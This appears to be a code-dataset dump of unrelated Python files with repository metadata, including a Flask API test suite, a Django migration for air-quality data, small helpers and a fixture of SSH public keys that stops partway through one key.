014eea863ff249ce2a9bd9a92e67fe3f598c5256 | 948 | py | Python | iolanta/cli/pretty_print.py | octadocs/octadocs | 62f4340681f4e38ed961b58c5147a657363cae4d | [
"MIT"
] | 1 | 2021-11-19T22:48:27.000Z | 2021-11-19T22:48:27.000Z | iolanta/cli/pretty_print.py | octadocs/octadocs | 62f4340681f4e38ed961b58c5147a657363cae4d | [
"MIT"
] | 34 | 2020-12-27T11:49:08.000Z | 2021-10-05T04:58:54.000Z | iolanta/cli/pretty_print.py | octadocs/octadocs | 62f4340681f4e38ed961b58c5147a657363cae4d | [
"MIT"
] | null | null | null | from datetime import date
from typing import Union
from classes import typeclass
@typeclass
def render_literal_value(literal_value) -> str:
"""Render a literal value nicely for printing."""
@render_literal_value.instance(None)
def _render_none(literal_value: None) -> str:
return '∅ None'
@render_literal_value.instance(bool)
def _render_bool(literal_value: bool) -> str:
icon = '✅' if literal_value else '❌'
return f'{icon} {literal_value}'
@render_literal_value.instance(int)
def _render_int(literal_value: Union[int, float]) -> str:
return f'🔢 {literal_value}'
@render_literal_value.instance(str)
def _render_str(literal_value: str) -> str:
return f'🔡 {literal_value}'
@render_literal_value.instance(date)
def _render_date(literal_value: date) -> str:
return f'📅 {literal_value}'
@render_literal_value.instance(object)
def _render_default(literal_value: object) -> str:
return f'❓ {literal_value}'
| 23.121951 | 57 | 0.741561 | 136 | 948 | 4.933824 | 0.264706 | 0.375559 | 0.187779 | 0.232489 | 0.226528 | 0.226528 | 0 | 0 | 0 | 0 | 0 | 0 | 0.140295 | 948 | 40 | 58 | 23.7 | 0.814724 | 0.045359 | 0 | 0 | 0 | 0 | 0.10901 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.291667 | false | 0 | 0.125 | 0.208333 | 0.666667 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
6d718cbaf42a6a571b4dbaf23ea16e5c5dc59cca | 259 | py | Python | deployment/colors.py | helix84/activae | 0e40bd71577f829b597bbf0931bbeb2c581ac410 | [
"BSD-3-Clause"
] | null | null | null | deployment/colors.py | helix84/activae | 0e40bd71577f829b597bbf0931bbeb2c581ac410 | [
"BSD-3-Clause"
] | null | null | null | deployment/colors.py | helix84/activae | 0e40bd71577f829b597bbf0931bbeb2c581ac410 | [
"BSD-3-Clause"
] | null | null | null | ESC = chr(27) + '['
RESET = '%s0m' % (ESC)
def green (s):
return ESC + '0;32m' + s + RESET
def red (s):
return ESC + '0;31m' + s + RESET
def yellow (s):
return ESC + '1;33m' + s + RESET
def blue (s):
return ESC + '0;34m' + s + RESET
| 17.266667 | 36 | 0.498069 | 42 | 259 | 3.071429 | 0.428571 | 0.217054 | 0.310078 | 0.255814 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083799 | 0.30888 | 259 | 14 | 37 | 18.5 | 0.636872 | 0 | 0 | 0 | 0 | 0 | 0.096525 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0 | 0.4 | 0.8 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
6d981b2393c741dcf0dcf6e71be38ef3bf04c36f | 24 | py | Python | SPADE/models/network/architecture.py | kaijieshi7/oneflow_imaginaire | 51e90165eeb3e8b22be1bec0ed3f7deb7d87b482 | [
"Apache-2.0"
] | null | null | null | SPADE/models/network/architecture.py | kaijieshi7/oneflow_imaginaire | 51e90165eeb3e8b22be1bec0ed3f7deb7d87b482 | [
"Apache-2.0"
] | null | null | null | SPADE/models/network/architecture.py | kaijieshi7/oneflow_imaginaire | 51e90165eeb3e8b22be1bec0ed3f7deb7d87b482 | [
"Apache-2.0"
] | null | null | null | import oneflow as flow
| 8 | 22 | 0.791667 | 4 | 24 | 4.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.208333 | 24 | 2 | 23 | 12 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6dda7679be71e1df8d4a91bdce3b646621d1300c | 96 | py | Python | venv/lib/python3.8/site-packages/future/types/newint.py | Retraces/UkraineBot | 3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71 | [
"MIT"
] | 2 | 2022-03-13T01:58:52.000Z | 2022-03-31T06:07:54.000Z | venv/lib/python3.8/site-packages/future/types/newint.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | 19 | 2021-11-20T04:09:18.000Z | 2022-03-23T15:05:55.000Z | venv/lib/python3.8/site-packages/future/types/newint.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | null | null | null | /home/runner/.cache/pip/pool/84/98/af/f6a503ae3975c647f334534bcda7ec44c3e815c44571ea22bd4cd521e9 | 96 | 96 | 0.895833 | 9 | 96 | 9.555556 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.416667 | 0 | 96 | 1 | 96 | 96 | 0.479167 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6ddb5648b06de7281ff82bf5a106edcddcc4e402 | 12,604 | py | Python | test_fitapp.py | As-12/Fit-App-backend- | d95b07fdb1aed882d01d3a70b4b0f308374bf304 | [
"MIT"
] | null | null | null | test_fitapp.py | As-12/Fit-App-backend- | d95b07fdb1aed882d01d3a70b4b0f308374bf304 | [
"MIT"
] | null | null | null | test_fitapp.py | As-12/Fit-App-backend- | d95b07fdb1aed882d01d3a70b4b0f308374bf304 | [
"MIT"
] | null | null | null | import os
from datetime import datetime
import unittest
import json
from flask_sqlalchemy import SQLAlchemy
from main import app
from main import db
import http.client
API_PREFIX = "/api/v1"
CLIENT_SECRET = os.environ['CLIENT_SECRET']
CLIENT_ID = os.environ['CLIENT_ID']
class FitAppTestSuite(unittest.TestCase):
@classmethod
def setUpClass(cls):
# Setup Authentication. Only need to execute once
conn = http.client.HTTPSConnection("as12production.auth0.com")
payload = {
"client_id": CLIENT_ID,
"client_secret": CLIENT_SECRET,
"audience": "Fit-API",
"grant_type": "client_credentials"
}
headers = {'content-type': "application/json"}
conn.request("POST", "/oauth/token", json.dumps(payload), headers)
res = conn.getresponse()
data = res.read()
cls.subject = f"{CLIENT_ID}@clients"
cls.token = json.loads(data.decode("utf-8"))['access_token']
def setUp(self):
"""Define test variables and initialize app."""
self.app = app
db.drop_all()
db.create_all()
self.client = self.app.test_client
# binds the app to the current context
with self.app.app_context():
self.db = SQLAlchemy()
def tearDown(self):
"""Executed after reach test"""
pass
"""
Global Endpoints
"""
def test_invalid_url(self):
response = self.client().get('/invalid', follow_redirects=True)
self.assertEqual(response.status_code, 404)
def test_health_endpoint(self):
response = self.client().get(f'{API_PREFIX}/health',
follow_redirects=True)
self.assertEqual(response.status_code, 200)
"""
User Endpoints
"""
"""
GET /users
"""
def test_get_user(self):
response = self.client().get(f'{API_PREFIX}/users', headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
def test_get_user_no_auth(self):
response = self.client().get(f'{API_PREFIX}/users',
follow_redirects=True)
self.assertEqual(response.status_code, 401)
"""
POST & DELETE /users
"""
def test_post_user_invalid_weight(self):
data = {
"target_weight": -20,
"height": 20,
"city": "string",
"state": "string"
}
response = self.client() \
.post(f'{API_PREFIX}/users', json=data,
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 422)
def test_post_user_bad_weight(self):
data = {
"target_weight": 0,
"height": -20,
"city": "string",
"state": "string"
}
response = self.client() \
.post(f'{API_PREFIX}/users', json=data,
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 422)
def test_post_user_no_auth(self):
data = {
"target_weight": 0,
"height": 20,
"city": "string",
"state": "string"
}
response = self.client() \
.post(f'{API_PREFIX}/users', json=data,
follow_redirects=True)
self.assertEqual(response.status_code, 401)
def test_post_and_delete_user(self):
data = {
"target_weight": 0,
"height": 20,
"city": "string",
"state": "string"
}
response = self.client() \
.post(f'{API_PREFIX}/users', json=data,
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 201)
# Cannot post same user twice
response = self.client() \
.post(f'{API_PREFIX}/users', json=data,
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 422)
response = self.client().get(f'{API_PREFIX}/users', headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.data)['count'], 1)
response = self.client() \
.delete(f'{API_PREFIX}/users/{self.subject}',
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 204)
response = self.client() \
.delete(f'{API_PREFIX}/users/{self.subject}',
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 404)
"""
PATCH /users
"""
def test_patch_user(self):
data = {
"target_weight": 0,
"height": 20,
"city": "string",
"state": "string"
}
response = self.client() \
.post(f'{API_PREFIX}/users', json=data,
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 201)
data = {
"target_weight": 25,
"height": 20,
"city": "Grapevine",
"state": "Texas"
}
response = self.client() \
.patch(f'{API_PREFIX}/users/{self.subject}',
json=data,
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 204)
data = {
"target_weight": -10,
"height": 20,
"city": "Grapevine",
"state": "Texas"
}
response = self.client() \
.patch(f'{API_PREFIX}/users/{self.subject}',
json=data,
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 422)
data = {
"target_weight": 10,
"height": -20,
"city": "Grapevine",
"state": "Texas"
}
response = self.client() \
.patch(f'{API_PREFIX}/users/{self.subject}',
json=data,
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 422)
response = self.client() \
.delete(f'{API_PREFIX}/users/{self.subject}',
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 204)
def test_patch_no_user(self):
data = {
"target_weight": 25,
"height": 20,
"city": "Grapevine",
"state": "Texas"
}
response = self.client() \
.patch(f'{API_PREFIX}/users/{self.subject}',
json=data,
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 404)
def test_patch_different_user(self):
data = {
"target_weight": 25,
"height": 20,
"city": "Grapevine",
"state": "Texas"
}
response = self.client() \
.patch(f'{API_PREFIX}/users/1234', json=data,
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 403)
"""
GET /progress
"""
def test_get_all_progress(self):
response = self.client() \
.get(f'{API_PREFIX}/progress',
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
response = self.client().get(f'{API_PREFIX}/progress',
follow_redirects=True)
self.assertEqual(response.status_code, 401)
"""
GET /progress/{id}
"""
def test_get_progress(self):
data = {
"target_weight": 0,
"height": 20,
"city": "string",
"state": "string"
}
response = self.client() \
.post(f'{API_PREFIX}/users', json=data,
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 201)
response = self.client() \
.get(f'{API_PREFIX}/progress/{self.subject}',
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
response = self.client() \
.get(f'{API_PREFIX}/progress/1234',
follow_redirects=True,
headers={
"Authorization": f"Bearer {self.token}"})
self.assertEqual(response.status_code, 403)
response = self.client() \
.get(f'{API_PREFIX}/progress/{self.subject}',
follow_redirects=True)
self.assertEqual(response.status_code, 401)
response = self.client() \
.delete(f'{API_PREFIX}/users/{self.subject}',
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 204)
"""
POST/PATCH /progress/{id}
"""
def test_post_patch_progress(self):
data = {
"target_weight": 0,
"height": 20,
"city": "string",
"state": "string"
}
response = self.client() \
.post(f'{API_PREFIX}/users', json=data,
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 201)
data = {
"track_date": datetime.today().date().strftime('%Y-%m-%d'),
"weight": 255,
"mood": "neutral",
"diet": "neutral"
}
response = self.client() \
.post(f'{API_PREFIX}/progress/{self.subject}',
json=data,
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 201)
data["weight"] = 500
response = self.client() \
.patch(f'{API_PREFIX}/progress/{self.subject}',
json=data,
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 204)
response = self.client() \
.post(f'{API_PREFIX}/progress/1234',
follow_redirects=True,
headers={
"Authorization": f"Bearer {self.token}"})
self.assertEqual(response.status_code, 403)
response = self.client() \
.patch(f'{API_PREFIX}/progress/{self.subject}',
follow_redirects=True)
self.assertEqual(response.status_code, 401)
response = self.client() \
.delete(f'{API_PREFIX}/users/{self.subject}',
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 204)
# Make the tests conveniently executable
if __name__ == "__main__":
unittest.main()
| 31.828283 | 74 | 0.508013 | 1,181 | 12,604 | 5.27265 | 0.127858 | 0.052995 | 0.0925 | 0.149028 | 0.780151 | 0.770997 | 0.770516 | 0.770516 | 0.753814 | 0.711418 | 0 | 0.020207 | 0.363932 | 12,604 | 395 | 75 | 31.908861 | 0.756517 | 0.017455 | 0 | 0.729642 | 0 | 0 | 0.195807 | 0.051015 | 0 | 0 | 0 | 0 | 0.107492 | 1 | 0.055375 | false | 0.003257 | 0.026059 | 0 | 0.084691 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6dfe264375cd69c323233c95b48b4075a6017cf3 | 4,840 | py | Python | pm_lookup/migrations/0001_initial.py | tommasosansone91/aqi_luftdaten | d78ffa562672095a9f9e8c763c2b021c41ed546b | [
"MIT"
] | null | null | null | pm_lookup/migrations/0001_initial.py | tommasosansone91/aqi_luftdaten | d78ffa562672095a9f9e8c763c2b021c41ed546b | [
"MIT"
] | 11 | 2020-06-06T01:39:10.000Z | 2021-06-09T17:47:07.000Z | pm_lookup/migrations/0001_initial.py | tommasosansone91/aqi_luftdaten | d78ffa562672095a9f9e8c763c2b021c41ed546b | [
"MIT"
] | null | null | null | # Generated by Django 2.2.8 on 2020-06-03 13:59
import django.contrib.postgres.fields
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='target_area_input_data',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('Name', models.CharField(max_length=256, unique=True)),
('Latitude', models.FloatField()),
('Longitude', models.FloatField()),
('Radius', models.FloatField()),
],
options={
'ordering': ['-Radius', 'Name'],
},
),
migrations.CreateModel(
name='target_area_output_data',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('Last_update_time', models.DateTimeField(default=django.utils.timezone.now)),
('PM10_mean', models.FloatField()),
('PM25_mean', models.FloatField()),
('PM10_quality', models.CharField(max_length=256)),
('PM25_quality', models.CharField(max_length=256)),
('PM10_cathegory', models.CharField(max_length=256)),
('PM25_cathegory', models.CharField(max_length=256)),
('n_selected_sensors', models.IntegerField(null=True)),
('Target_area_input_data', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='pm_lookup.target_area_input_data')),
],
options={
'ordering': ['-Target_area_input_data__Radius', 'Target_area_input_data__Name'],
},
),
migrations.CreateModel(
name='target_area_history_series',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('Record_time_values', django.contrib.postgres.fields.ArrayField(base_field=models.DateTimeField(), size=None)),
('PM10_mean_values', django.contrib.postgres.fields.ArrayField(base_field=models.FloatField(), size=None)),
('PM25_mean_values', django.contrib.postgres.fields.ArrayField(base_field=models.FloatField(), size=None)),
('PM10_quality_values', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=256), size=None)),
('PM25_quality_values', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=256), size=None)),
('PM10_cathegory_values', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=256), size=None)),
('PM25_cathegory_values', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=256), size=None)),
('n_selected_sensors_values', django.contrib.postgres.fields.ArrayField(base_field=models.IntegerField(null=True), size=None)),
('PM10_graph_div', models.TextField()),
('PM25_graph_div', models.TextField()),
('Target_area_input_data', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pm_lookup.target_area_input_data')),
],
options={
'ordering': ['-Target_area_input_data__Radius', 'Target_area_input_data__Name'],
},
),
migrations.CreateModel(
name='target_area_history_data',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('Last_update_time', models.DateTimeField(default=django.utils.timezone.now)),
('PM10_mean', models.FloatField()),
('PM25_mean', models.FloatField()),
('PM10_quality', models.CharField(max_length=256)),
('PM25_quality', models.CharField(max_length=256)),
('PM10_cathegory', models.CharField(max_length=256)),
('PM25_cathegory', models.CharField(max_length=256)),
('n_selected_sensors', models.IntegerField(null=True)),
('Target_area_input_data', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pm_lookup.target_area_input_data')),
],
options={
'ordering': ['-Target_area_input_data__Radius', 'Target_area_input_data__Name', '-Last_update_time'],
'unique_together': {('Target_area_input_data', 'Last_update_time', 'PM10_mean', 'PM25_mean')},
},
),
]
| 55 | 149 | 0.620455 | 504 | 4,840 | 5.660714 | 0.180556 | 0.059586 | 0.073607 | 0.093235 | 0.797406 | 0.775675 | 0.762005 | 0.762005 | 0.762005 | 0.721346 | 0 | 0.026761 | 0.243388 | 4,840 | 87 | 150 | 55.632184 | 0.752321 | 0.009298 | 0 | 0.55 | 1 | 0 | 0.208429 | 0.109117 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.05 | 0 | 0.1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
09df2a67a35d55dab9ac1d6ce094e69c08291b69 | 115 | py | Python | platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/nixi/phys/Phys_sigfox.py | lmnotran/gecko_sdk | 2e82050dc8823c9fe0e8908c1b2666fb83056230 | [
"Zlib"
] | 82 | 2016-06-29T17:24:43.000Z | 2021-04-16T06:49:17.000Z | platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/nixi/phys/Phys_sigfox.py | lmnotran/gecko_sdk | 2e82050dc8823c9fe0e8908c1b2666fb83056230 | [
"Zlib"
] | 6 | 2022-01-12T18:22:08.000Z | 2022-03-25T10:19:27.000Z | platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/nixi/phys/Phys_sigfox.py | lmnotran/gecko_sdk | 2e82050dc8823c9fe0e8908c1b2666fb83056230 | [
"Zlib"
] | 56 | 2016-08-02T10:50:50.000Z | 2021-07-19T08:57:34.000Z | from pyradioconfig.parts.dumbo.phys.Phys_sigfox import PHYS_Sigfox
class PHYS_Sigfox_nixi(PHYS_Sigfox):
pass
| 23 | 66 | 0.826087 | 17 | 115 | 5.294118 | 0.588235 | 0.444444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.113043 | 115 | 5 | 67 | 23 | 0.882353 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 6 |
61d204707beb9fff5d7d0a8afba5ad2cac4b64b0 | 27,128 | py | Python | tests/valid_keys_rfc4716.py | cryptokeytools/python-cryptokeytools | ad733bfbfdf90d9e330adf0772f90accb93f4ecc | [
"BSD-3-Clause"
] | null | null | null | tests/valid_keys_rfc4716.py | cryptokeytools/python-cryptokeytools | ad733bfbfdf90d9e330adf0772f90accb93f4ecc | [
"BSD-3-Clause"
] | null | null | null | tests/valid_keys_rfc4716.py | cryptokeytools/python-cryptokeytools | ad733bfbfdf90d9e330adf0772f90accb93f4ecc | [
"BSD-3-Clause"
] | null | null | null | keys = [
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "1024-bit DSA, converted by ojarva from Ope"\nAAAAB3NzaC1kc3MAAACBAPlHIP5sD+T8/Sx1DGEiCzCXqpl7ww40jBg7wTkxu44OH6pNog\n5PjJt5M4NBULhKva/i+bhIM3ba+H1Or+aHWWFHACV6W2FCGk/k37ApRF8sIa4hsnN0P9qn\n6VfhbJKee+DBxa21WjjY/MZiljmJz7IQHx5RTxX9I/hJ7cL+aNmrAAAAFQCKteqc4IkgIr\njpcpStsxYAhb3MqQAAAIEA+SfIKuTr7QPcinsZQDdmZOXqcg+u9TLzHA4c47y0Kns3T3BV\nPr9rWdmuh6eImzLO4wMLxLvcg3ecrqFuiCp1IHvXENkGlpB17S+uOXlVDY+sTdXyvYKRKi\nrg5IZefIAP/m08c0QGkhFDbo4ysr9D5gXgH3LB2rMPIAbvMWm/HZQAAACBAKWtAE3hXRQX\n5KtI4AoIWVTly/6T4JNBt4u24ZRqV7X//CZEZ0cS5YpR/frlpUDI3WKoMtS+VmT3cBFZIN\nashIxZyfBF8+0UX3s34HwNfp0hDW3ZdgZJU56GC2eclMantYGeVrMxgTQd80pxZFgByEho\nXGeZaAwUzN8ULo9jHQqM\n---- END SSH2 PUBLIC KEY ----\n',
1024,
'MD5:76:66:08:8c:86:81:7e:f0:7b:cd:fa:c3:8c:8b:83:c0',
None,
'dsa_basic_1_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "1024-bit DSA, converted by ojarva from Ope"\nAAAAB3NzaC1kc3MAAACBAJKa9kgpSUBLgPwgkRvYDayXIjigt36VZShchgKSNxjOXfuJpN\nP7BUZFJSqE1ZKvMcmMKah2V15a+aV8H5TnFYSUT+aq5BH2lSxx5cHQ/xrSMBobqjxQHQJs\nhrHugnrBmXvhadWHZ8T/kV0agddRTuC/nY28RA2OOLFukEc2C/O7AAAAFQDMCEXIHwdtyx\nv0HDBHhN+N9pzedwAAAIB7zE3EQ8tHvEhoHZ3lc53qMCfow64rv5L0eim6hqC/cwzWHGFk\n9PXAHgXOZBMB9P2gCdiL1Vydru/6ib3EbzAGR21xhvxlrZQqtJ7jKql0ZbVCqzYijBwJCU\n2OAvaxjyTZwg5o87h1LqxU9RRFJTJerMCcnEy4X7iIIF2S8TLeswAAAIAxQ9/DLm7l3X43\n8VFgdTKSOrrfgx5q5/sKXgauNTxaYfDEBlmWdFZme3+lB1gR0td9NMxH/ffntXd8ilB+9O\n8E87+K0Fi7aDWlToVbsvtyK/gLTwzg+qEjeHkbjN7yUltvhzzvLkJN7NodWx4ECNP9Kuxz\nxq711uoFOiC+pFjJhQ==\n---- END SSH2 PUBLIC KEY ----\n',
1024,
'MD5:ff:eb:5b:a2:31:26:4a:2f:90:60:93:1d:1c:e5:ac:40',
None,
'dsa_basic_2_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "16383-bit RSA, converted by ojarva from Op"\n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\ndVKIsspRC9PeksJrlCPzx